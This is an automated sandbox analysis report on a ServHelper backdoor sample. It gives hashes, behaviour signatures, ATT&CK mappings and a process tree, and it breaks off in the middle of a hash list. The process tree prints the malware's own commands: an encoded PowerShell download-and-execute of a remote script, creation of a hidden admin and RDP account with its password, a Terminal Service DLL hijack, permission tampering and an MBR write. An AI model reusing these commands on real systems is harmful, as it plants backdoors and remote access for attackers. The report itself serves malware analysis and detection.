servhelper | 2214bdc78b558176a17484bcc02079a5470e0b49073d50d19b522d67dc4396e3

Analysis

max time kernel
137s
max time network
82s
platform
windows7_x64
resource
win7v20210410
submitted
30-07-2021 15:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe
Size

9.2MB
MD5

5e12e56a643c71b913ea60f48f28726d
SHA1

8fd9ef3e15b545335c9cf8a16e7d49bdedc7b6fd
SHA256

79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d
SHA512

807888068394b8072d607a83b7a181f5018c21c1efd2b8ae433ac59dc28bfbec23e1b13d8b6a2447a3ff8bb9b7ecd71d4d7bff55903a2d23a60b817142c9bae3

Score

10^/10

servhelper backdoor bootkit discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

12 2564 powershell.exe
Executes dropped EXE 4 IoCs

Processes:

ViJoy.exeexe2.exeexe1.exeNFWCHK.exe

pid process

852 ViJoy.exe
848 exe2.exe
1384 exe1.exe
992 NFWCHK.exe
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exe

pid process

280 icacls.exe
1852 icacls.exe
2000 icacls.exe
1528 icacls.exe
1468 takeown.exe
1912 icacls.exe
1592 icacls.exe
1652 icacls.exe
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

flow	pid	process
12	2564	powershell.exe

pid	process
852	ViJoy.exe
848	exe2.exe
1384	exe1.exe
992	NFWCHK.exe

pid	process
280	icacls.exe
1852	icacls.exe
2000	icacls.exe
1528	icacls.exe
1468	takeown.exe
1912	icacls.exe
1592	icacls.exe
1652	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Branding\mediasrv.png	upx
\Windows\Branding\mediasvc.png	upx

Deletes itself 1 IoCs

Processes:

powershell.exe

pid process

1720 powershell.exe
Loads dropped DLL 7 IoCs

Processes:

ViJoy.exeexe2.exe

pid process

852 ViJoy.exe
852 ViJoy.exe
852 ViJoy.exe
848 exe2.exe
1916
1916
1264
Modifies file permissions 1 TTPs 8 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exe

pid process

1592 icacls.exe
1652 icacls.exe
280 icacls.exe
1852 icacls.exe
2000 icacls.exe
1528 icacls.exe
1468 takeown.exe
1912 icacls.exe
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1067

Processes:

exe2.exe

description ioc process

File opened for modification \??\PhysicalDrive0 exe2.exe
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe

pid	process
852	ViJoy.exe
852	ViJoy.exe
852	ViJoy.exe
848	exe2.exe
1916
1916
1264

pid	process
1592	icacls.exe
1652	icacls.exe
280	icacls.exe
1852	icacls.exe
2000	icacls.exe
1528	icacls.exe
1468	takeown.exe
1912	icacls.exe

description	ioc	process
File opened for modification	\??\PhysicalDrive0	exe2.exe

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Windows directory 21 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8a74ffc7-9cca-4845-bd46-8ff96c4ac43f	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c0b142a5-2b59-45fd-a99b-ce1f142c850f	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_55dbdebd-e428-42e4-82e2-2ef0cdfc7458	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_dcd10f91-0b5f-40f7-b451-e272660bae5d	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ac761484-0ecd-4b05-83ec-285cc54d0e96	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_90ab2bf7-a5b2-485f-bbb1-f5e3aeea5b24	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_578ff6f3-25c8-4688-81c3-ff3e7179e5c3	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Z2QY7QFOTGMKT0BUNU70.temp	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e0bb34e5-3a6d-4514-8e04-07c75cc5c314	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_abd106a9-f5f6-41e9-b78b-a62c298b662f	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c4a40091-f455-420c-bbdd-90c865751b3b	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c695c2dd-95c9-457e-b147-d950bcde996e	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

exe2.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main exe2.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main	exe2.exe

Modifies data under HKEY_USERS 4 IoCs

Processes:

WMIC.exeWMIC.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 80bafa925785d701	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1468 reg.exe
Runs net.exe

pid	process
1468	reg.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1720	powershell.exe
1720	powershell.exe
2032	powershell.exe
2032	powershell.exe
432	powershell.exe
432	powershell.exe
1528	powershell.exe
1528	powershell.exe
1720	powershell.exe
1720	powershell.exe
1720	powershell.exe
2564	powershell.exe
2564	powershell.exe

Suspicious behavior: LoadsDriver 5 IoCs

Processes:

pid process

464
1916
1916
1916
1916

pid	process
464
1916
1916
1916
1916

Suspicious use of AdjustPrivilegeToken 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1720	powershell.exe
Token: SeDebugPrivilege	2032	powershell.exe
Token: SeDebugPrivilege	432	powershell.exe
Token: SeDebugPrivilege	1528	powershell.exe
Token: SeRestorePrivilege	1592	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	2428	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2428	WMIC.exe
Token: SeAuditPrivilege	2428	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2428	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2428	WMIC.exe
Token: SeAuditPrivilege	2428	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2488	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2488	WMIC.exe
Token: SeAuditPrivilege	2488	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2488	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2488	WMIC.exe
Token: SeAuditPrivilege	2488	WMIC.exe
Token: SeDebugPrivilege	2564	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

exe2.exe

pid process

848 exe2.exe
848 exe2.exe

pid	process
848	exe2.exe
848	exe2.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exeViJoy.exeexe2.exeexe1.exepowershell.execsc.exe

description	pid	process	target process
PID 308 wrote to memory of 852	308	79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe	ViJoy.exe
PID 308 wrote to memory of 852	308	79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe	ViJoy.exe
PID 308 wrote to memory of 852	308	79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe	ViJoy.exe
PID 308 wrote to memory of 852	308	79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe	ViJoy.exe
PID 852 wrote to memory of 848	852	ViJoy.exe	exe2.exe
PID 852 wrote to memory of 848	852	ViJoy.exe	exe2.exe
PID 852 wrote to memory of 848	852	ViJoy.exe	exe2.exe
PID 852 wrote to memory of 848	852	ViJoy.exe	exe2.exe
PID 852 wrote to memory of 848	852	ViJoy.exe	exe2.exe
PID 852 wrote to memory of 848	852	ViJoy.exe	exe2.exe
PID 852 wrote to memory of 848	852	ViJoy.exe	exe2.exe
PID 852 wrote to memory of 1384	852	ViJoy.exe	exe1.exe
PID 852 wrote to memory of 1384	852	ViJoy.exe	exe1.exe
PID 852 wrote to memory of 1384	852	ViJoy.exe	exe1.exe
PID 852 wrote to memory of 1384	852	ViJoy.exe	exe1.exe
PID 848 wrote to memory of 992	848	exe2.exe	NFWCHK.exe
PID 848 wrote to memory of 992	848	exe2.exe	NFWCHK.exe
PID 848 wrote to memory of 992	848	exe2.exe	NFWCHK.exe
PID 848 wrote to memory of 992	848	exe2.exe	NFWCHK.exe
PID 1384 wrote to memory of 1720	1384	exe1.exe	powershell.exe
PID 1384 wrote to memory of 1720	1384	exe1.exe	powershell.exe
PID 1384 wrote to memory of 1720	1384	exe1.exe	powershell.exe
PID 1720 wrote to memory of 432	1720	powershell.exe	csc.exe
PID 1720 wrote to memory of 432	1720	powershell.exe	csc.exe
PID 1720 wrote to memory of 432	1720	powershell.exe	csc.exe
PID 432 wrote to memory of 1500	432	csc.exe	cvtres.exe
PID 432 wrote to memory of 1500	432	csc.exe	cvtres.exe
PID 432 wrote to memory of 1500	432	csc.exe	cvtres.exe
PID 1720 wrote to memory of 2032	1720	powershell.exe	powershell.exe
PID 1720 wrote to memory of 2032	1720	powershell.exe	powershell.exe
PID 1720 wrote to memory of 2032	1720	powershell.exe	powershell.exe
PID 1720 wrote to memory of 432	1720	powershell.exe	powershell.exe
PID 1720 wrote to memory of 432	1720	powershell.exe	powershell.exe
PID 1720 wrote to memory of 432	1720	powershell.exe	powershell.exe
PID 1720 wrote to memory of 1528	1720	powershell.exe	powershell.exe
PID 1720 wrote to memory of 1528	1720	powershell.exe	powershell.exe
PID 1720 wrote to memory of 1528	1720	powershell.exe	powershell.exe
PID 1720 wrote to memory of 1468	1720	powershell.exe	takeown.exe
PID 1720 wrote to memory of 1468	1720	powershell.exe	takeown.exe
PID 1720 wrote to memory of 1468	1720	powershell.exe	takeown.exe
PID 1720 wrote to memory of 1912	1720	powershell.exe	icacls.exe
PID 1720 wrote to memory of 1912	1720	powershell.exe	icacls.exe
PID 1720 wrote to memory of 1912	1720	powershell.exe	icacls.exe
PID 1720 wrote to memory of 1592	1720	powershell.exe	icacls.exe
PID 1720 wrote to memory of 1592	1720	powershell.exe	icacls.exe
PID 1720 wrote to memory of 1592	1720	powershell.exe	icacls.exe
PID 1720 wrote to memory of 1652	1720	powershell.exe	icacls.exe
PID 1720 wrote to memory of 1652	1720	powershell.exe	icacls.exe
PID 1720 wrote to memory of 1652	1720	powershell.exe	icacls.exe
PID 1720 wrote to memory of 280	1720	powershell.exe	icacls.exe
PID 1720 wrote to memory of 280	1720	powershell.exe	icacls.exe
PID 1720 wrote to memory of 280	1720	powershell.exe	icacls.exe
PID 1720 wrote to memory of 1852	1720	powershell.exe	icacls.exe
PID 1720 wrote to memory of 1852	1720	powershell.exe	icacls.exe
PID 1720 wrote to memory of 1852	1720	powershell.exe	icacls.exe
PID 1720 wrote to memory of 2000	1720	powershell.exe	icacls.exe
PID 1720 wrote to memory of 2000	1720	powershell.exe	icacls.exe
PID 1720 wrote to memory of 2000	1720	powershell.exe	icacls.exe
PID 1720 wrote to memory of 1528	1720	powershell.exe	icacls.exe
PID 1720 wrote to memory of 1528	1720	powershell.exe	icacls.exe
PID 1720 wrote to memory of 1528	1720	powershell.exe	icacls.exe
PID 1720 wrote to memory of 964	1720	powershell.exe	reg.exe
PID 1720 wrote to memory of 964	1720	powershell.exe	reg.exe
PID 1720 wrote to memory of 964	1720	powershell.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe
"C:\Users\Admin\AppData\Local\Temp\79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:308

C:\Users\Admin\AppData\Local\Temp\ViJoy.exe
"C:\Users\Admin\AppData\Local\Temp\ViJoy.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:852

C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
"C:\Users\Admin\AppData\Roaming\Templers\exe2.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:848

C:\Users\Public\Documents\Wondershare\NFWCHK.exe
C:\Users\Public\Documents\Wondershare\NFWCHK.exe
4⤵
- Executes dropped EXE
PID:992

C:\Users\Admin\AppData\Roaming\Templers\exe1.exe
"C:\Users\Admin\AppData\Roaming\Templers\exe1.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1384

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
4⤵
- Deletes itself
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1720

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5sxesnat\5sxesnat.cmdline"
5⤵
- Suspicious use of WriteProcessMemory
PID:432

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5A21.tmp" "c:\Users\Admin\AppData\Local\Temp\5sxesnat\CSCC91B983069BF4F51BD1C6A36E5BB7AD.TMP"
6⤵
PID:1500

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1528

C:\Windows\system32\takeown.exe
"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1468

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1912

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1592

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1652

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:280

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1852

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2000

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1528

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
5⤵
PID:964

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
5⤵
- Modifies registry key
PID:1468

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
5⤵
PID:1912

C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
5⤵
PID:1556

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
6⤵
PID:1616

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
5⤵
PID:1852

C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
6⤵
PID:952

C:\Windows\system32\net.exe
net start rdpdr
7⤵
PID:1988

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
8⤵
PID:1784

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
5⤵
PID:2028

C:\Windows\system32\cmd.exe
cmd /c net start TermService
6⤵
PID:1912

C:\Windows\system32\net.exe
net start TermService
7⤵
PID:1840

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
8⤵
PID:1144

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
5⤵
PID:2828

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
5⤵
PID:2840

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
PID:1344

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 000000 /del
2⤵
PID:2000

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
3⤵
PID:2056

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc bu4XEaZT /add
1⤵
PID:2068

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc bu4XEaZT /add
2⤵
PID:2092

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc bu4XEaZT /add
3⤵
PID:2104

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
PID:2128

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
2⤵
PID:2152

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
3⤵
PID:2164

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
1⤵
PID:2192

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
2⤵
PID:2216

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
3⤵
PID:2228

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:2252

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
2⤵
PID:2276

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
3⤵
PID:2288

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc bu4XEaZT
1⤵
PID:2320

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc bu4XEaZT
2⤵
PID:2344

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc bu4XEaZT
3⤵
PID:2356

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:2384

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2428

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:2464

C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2488

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:2528

C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
2⤵
PID:2552

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2564

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Bootkit

T1067

Privilege Escalation

Defense Evasion

Modify Registry

T1112

File Permissions Modification

T1222

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_00676e6f-05a9-4da9-aa0e-696a0ccc9272
MD5
d89968acfbd0cd60b51df04860d99896

SHA1
b3c29916ccb81ce98f95bbf3aa8a73de16298b29

SHA256
1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9

SHA512
b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_22330762-ff7d-40b8-a48f-aa5932dc17c9
MD5
6f0d509e28be1af95ba237d4f43adab4

SHA1
c665febe79e435843553bee86a6cea731ce6c5e4

SHA256
f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e

SHA512
8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2653500a-e16e-4c7d-b00f-2ef58238a6c3
MD5
a70ee38af4bb2b5ed3eeb7cbd1a12fa3

SHA1
81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9

SHA256
dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d

SHA512
8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_31e6a2d0-b6b1-4c20-9630-7dcb57a92d29
MD5
2d5cd190b5db0620cd62e3cd6ba1dcd3

SHA1
ff4f229f4fbacccdf11d98c04ba756bda80aac7a

SHA256
ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d

SHA512
